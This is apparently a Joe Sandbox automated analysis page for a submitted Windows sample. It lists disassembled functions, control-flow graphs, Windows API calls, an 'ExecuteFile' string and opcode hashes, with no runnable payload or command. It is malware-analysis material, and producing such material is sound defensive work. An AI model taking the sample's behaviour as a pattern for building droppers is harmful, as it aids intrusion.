                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                  • String ID:
                                                                  • API String ID: 359084233-0
                                                                  • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                  • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                  • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                  • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E
                                                                  Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                  • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                  • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                  • String ID:
                                                                  • API String ID: 635176117-0
                                                                  • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                  • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                  • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                  • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89
                                                                  Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,00000015,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@
                                                                  • String ID: ExecuteFile
                                                                  • API String ID: 1033339047-323923146
                                                                  • Opcode ID: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                  • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                  • Opcode Fuzzy Hash: 612dc6f8e3fe8df0745ed42aa02adea807ab2e0a0b71f5bf8dc2b3d1454147a6
                                                                  • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D
                                                                  Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                  • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@memmove
                                                                  • String ID:
                                                                  • API String ID: 3828600508-0
                                                                  • Opcode ID: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                  • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                  • Opcode Fuzzy Hash: 2c1e852e3357fe345785b0ad8426fcfe448c8ec3a37487201466d82e595bf6a2
                                                                  • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                  Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID: @
                                                                  • API String ID: 1890195054-2766056989
                                                                  • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                  • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                  • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                  • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                  Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                    • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                    • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                    • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                  • String ID:
                                                                  • API String ID: 4269121280-0
                                                                  • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                  • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                  • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                  • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                  Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??3@H_prolog
                                                                  • String ID:
                                                                  • API String ID: 1329742358-0
                                                                  • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                  • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                  • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                  • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                  Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@??3@
                                                                  • String ID:
                                                                  • API String ID: 1936579350-0
                                                                  • Opcode ID: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                  • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                  • Opcode Fuzzy Hash: ebac23084a16b944365a47061f6b21e986bd860b63916dd214b45b095081060c
                                                                  • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                  Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                  • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastPointer
                                                                  • String ID:
                                                                  • API String ID: 2976181284-0
                                                                  • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                  • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                  • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                  • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                  Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                  • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AllocExceptionStringThrow
                                                                  • String ID:
                                                                  • API String ID: 3773818493-0
                                                                  • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                  • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                  • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                  • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                  Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID:
                                                                  • API String ID: 3168844106-0
                                                                  • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                  • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                  • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                  • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                  Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                  • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                  • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                  • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                  Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                  • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                  • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                  • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                  Function 00411A2D Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID:
                                                                  • API String ID: 3519838083-0
                                                                  • Opcode ID: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                  • Instruction ID: 375caa893e42e0daca7b158ffe4b4b415bc54d3572d418f3e5e61c8e5be1c541
                                                                  • Opcode Fuzzy Hash: 05aa82fd4493c2954843b58147a6e12e638aaadf2772ca9641b0bace8f10624d
                                                                  • Instruction Fuzzy Hash: 30F0F272500109BBCF029F85D901AEEBB36EB48354F00811ABA1161160D33A9961AB99
                                                                  Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0040D985: CloseHandle.KERNELBASE(00000001,000000FF,0040DA61,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50,00000000,00000001,00000001,00000080), ref: 0040D990
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,00413330,?,0040DB39,L@,40000000,00000000,00000000,00000000,0040DB50), ref: 0040DA78
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateFileHandle
                                                                  • String ID:
                                                                  • API String ID: 3498533004-0
                                                                  • Opcode ID: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                  • Instruction ID: 040011ad7fb3de3f437c6c7e3ebc1dcda5640d8293b7e84d035d3e38099293ab
                                                                  • Opcode Fuzzy Hash: 08bceb1980caaee1328d4f84b7def86f7a2986f91a3075995b51455990be9560
                                                                  • Instruction Fuzzy Hash: A1E04F32140219ABCF215FA49C01BCA7B96AF09760F144526BE11A61E0C672D465AF94
                                                                  Function 0040DB97 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNELBASE(?,?,00000001,00000000,00000000,?,?,0040DD78,00000001,00000000,00000000,00413330,?,00404D94,?,?), ref: 0040DBBA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                  • Instruction ID: ec3d056ad33d5175d1bee219b94afd5900c8108b90431a53c6143dcb1d381838
                                                                  • Opcode Fuzzy Hash: 3077b537328fed6cd21bdd98b87c61334e39a2b5a14a0e6e22fef2783c677b0b
                                                                  • Instruction Fuzzy Hash: D7E0C275600208FBCB00CF95C801B9E7BBABB49755F10C069F918AA2A0D739AA10DF54
                                                                  Function 0040653F Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _beginthreadex.MSVCRT ref: 00406552
                                                                    • Part of subcall function 00406501: GetLastError.KERNEL32(00406563,00000000), ref: 004064F5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1760084360.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1760067567.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760146775.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760163507.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1760190975.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_OdiHmn3pRK.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_beginthreadex
                                                                  • String ID:
                                                                  • API String ID: 4034172046-0
                                                                  • Opcode ID: e5ca857e6cae9760b500a95e192be9ea992c298de85bf840c792a1269a380ec9
